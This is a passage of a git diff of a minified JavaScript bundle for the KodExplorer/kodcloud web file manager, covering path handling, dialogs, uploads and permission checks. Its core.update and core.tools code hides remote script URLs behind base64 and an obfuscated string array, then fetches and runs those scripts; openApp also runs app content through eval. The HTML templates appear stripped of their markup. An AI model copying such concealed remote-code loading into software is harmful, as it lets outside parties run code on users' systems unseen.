ie8 css hack; diff --git a/static/js/app/src/api/view/main.js b/static/js/app/src/api/view/main.js index e4e5073..c4a0125 100755 --- a/static/js/app/src/api/view/main.js +++ b/static/js/app/src/api/view/main.js @@ -1,4 +1,4 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/api/view/main",["lib/jquery-lib","lib/util","lib/artDialog/jquery-artDialog","lib/contextMenu/jquery-contextMenu","../../../common/core","../../../common/rightMenuExtence","../../../app/appBase","../../../app/editor","../../../app/openWith","../../../app/html","./fileShow"],function(e){e("lib/jquery-lib"),e("lib/util"),e("lib/artDialog/jquery-artDialog"),e("lib/contextMenu/jquery-contextMenu"),core=e("../../../common/core"),fileShow=e("./fileShow"),window.require=e,$(document).ready(function(){$(".init-loading").fadeOut(450).addClass("pop_fadeout"),core.init(),fileShow.init(),$("title").html(G.shareInfo.name)})}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
请联系主机商或网管,检查防火墙配置!"),t='
'+t+"
",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
loading..
';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
"+"
"+s+"
"+"
"},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
\n \n
\n
\n
\n
{{LNG.upload_select}}
\n \n \n
\n \n
\n
\n \n \n
\n
\n
\n
\n
\n
\n
\n
\n
\n
{{LNG.download_address}}\n
\n \n \n \n
\n\n
\n
\n
\n
\n
\n
\n
\n'),define("app/common/tpl/formMake.html",[],'
\n
\n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
\n {{if formTab}}\n
\n {{each formTab tab tabIndex}}\n {{if tab}}\n
\n {{/if}}\n {{/each}}\n
\n
\n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
{{item}}
\n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
\n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
\n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
\n
\n {{@item.display}}: {{if item.require}}*{{/if}}\n
\n
\n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
\n \n \n \n \n
\n
\n
{{LNG.user}}
\n \n
\n
\n
{{LNG.group}}
\n \n
\n
\n
{{LNG.system_member_role}}
\n \n
\n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
{{@item.desc}}
\n {{else}}\n {{@item.desc}}\n {{/if}}\n
\n
\n
\n {{/if}}\n {{/each}}\n
\n
\n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0];if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3)); -break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
'+'
'+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var b=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){b(),r=setInterval(function(){b()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box 